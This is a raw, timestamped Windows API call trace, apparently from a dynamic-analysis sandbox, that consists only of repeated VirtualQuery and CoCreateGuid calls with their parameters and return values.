[0079.920] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xaf2fd0c8, Data2=0x6aa1, Data3=0x42fc, Data4=([0]=0xb5, [1]=0x24, [2]=0x4a, [3]=0xc6, [4]=0xef, [5]=0x6d, [6]=0x8e, [7]=0x49))) returned 0x0
[0079.920] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfc5484f1, Data2=0x386a, Data3=0x4f1f, Data4=([0]=0xa9, [1]=0xf5, [2]=0xb2, [3]=0x1a, [4]=0x2a, [5]=0xb2, [6]=0x22, [7]=0x19))) returned 0x0
[0079.921] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.921] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.921] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.921] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.922] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.922] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.922] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.922] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.922] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.923] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.923] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.923] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.923] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.923] VirtualQuery (in: lpAddress=0x16bbb0, lpBuffer=0x16ca70, dwLength=0x30 | out: lpBuffer=0x16ca70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.924] VirtualQuery (in: lpAddress=0x16bbb0, lpBuffer=0x16ca70, dwLength=0x30 | out: lpBuffer=0x16ca70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.925] VirtualQuery (in: lpAddress=0x16bbb0, lpBuffer=0x16ca70, dwLength=0x30 | out: lpBuffer=0x16ca70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.925] VirtualQuery (in: lpAddress=0x16bbb0, lpBuffer=0x16ca70, dwLength=0x30 | out: lpBuffer=0x16ca70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.925] VirtualQuery (in: lpAddress=0x16b2a0, lpBuffer=0x16c160, dwLength=0x30 | out: lpBuffer=0x16c160*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.926] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.927] VirtualQuery (in: lpAddress=0x16b6e0, lpBuffer=0x16c5a0, dwLength=0x30 | out: lpBuffer=0x16c5a0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.928] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.928] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.928] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.928] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.928] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x49e61067, Data2=0x7b0, Data3=0x4703, Data4=([0]=0xbe, [1]=0x4f, [2]=0xdf, [3]=0xc4, [4]=0x73, [5]=0x1d, [6]=0xc0, [7]=0x6b))) returned 0x0
[0079.929] VirtualQuery (in: lpAddress=0x16b2a0, lpBuffer=0x16c160, dwLength=0x30 | out: lpBuffer=0x16c160*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.929] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.930] VirtualQuery (in: lpAddress=0x16b550, lpBuffer=0x16c410, dwLength=0x30 | out: lpBuffer=0x16c410*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.930] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x92912c0, Data2=0x7025, Data3=0x4d2d, Data4=([0]=0xbc, [1]=0x6f, [2]=0xf4, [3]=0xde, [4]=0x5a, [5]=0x37, [6]=0x6c, [7]=0x41))) returned 0x0
[0079.930] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xb573d80a, Data2=0x7b0f, Data3=0x4a01, Data4=([0]=0xaa, [1]=0xf2, [2]=0xfa, [3]=0xe3, [4]=0x2d, [5]=0x49, [6]=0xe6, [7]=0x9d))) returned 0x0
[0079.931] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd04ff6e9, Data2=0xb7d6, Data3=0x4ec8, Data4=([0]=0xa9, [1]=0x12, [2]=0x55, [3]=0x32, [4]=0x1e, [5]=0xab, [6]=0x8a, [7]=0x96))) returned 0x0
[0079.931] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfc2ac1, Data2=0xb248, Data3=0x42b4, Data4=([0]=0x97, [1]=0x34, [2]=0xc0, [3]=0x33, [4]=0x49, [5]=0xf9, [6]=0x4, [7]=0xbb))) returned 0x0
[0079.931] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7da2b813, Data2=0xefaf, Data3=0x4310, Data4=([0]=0xa9, [1]=0x67, [2]=0x2, [3]=0x95, [4]=0x1c, [5]=0xe9, [6]=0x15, [7]=0x11))) returned 0x0
[0079.931] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xdd54ccea, Data2=0x61b6, Data3=0x41b4, Data4=([0]=0xb0, [1]=0x29, [2]=0x4e, [3]=0x48, [4]=0xdf, [5]=0xa2, [6]=0x7b, [7]=0x85))) returned 0x0
[0079.932] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x838dffac, Data2=0x8fd9, Data3=0x44b7, Data4=([0]=0xa6, [1]=0x7d, [2]=0xe7, [3]=0x38, [4]=0xd, [5]=0x3e, [6]=0xbd, [7]=0x1a))) returned 0x0
[0079.932] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd769443a, Data2=0x8ed7, Data3=0x4174, Data4=([0]=0xa1, [1]=0xa3, [2]=0xba, [3]=0x7e, [4]=0x3c, [5]=0x63, [6]=0xc1, [7]=0x66))) returned 0x0
[0079.932] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.932] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.932] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.932] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.933] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.933] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.933] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.933] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.933] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.934] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.934] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.934] VirtualQuery (in: lpAddress=0x16b110, lpBuffer=0x16bfd0, dwLength=0x30 | out: lpBuffer=0x16bfd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.934] VirtualQuery (in: lpAddress=0x16b1a0, lpBuffer=0x16c060, dwLength=0x30 | out: lpBuffer=0x16c060*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.934] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.935] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x978753e8, Data2=0x415e, Data3=0x4d71, Data4=([0]=0xae, [1]=0x50, [2]=0xa7, [3]=0x13, [4]=0xe1, [5]=0xd, [6]=0xb8, [7]=0x1b))) returned 0x0
[0079.936] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.936] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.936] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.936] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.936] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.937] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.938] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.938] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.938] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.938] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.938] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.939] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.939] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.939] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
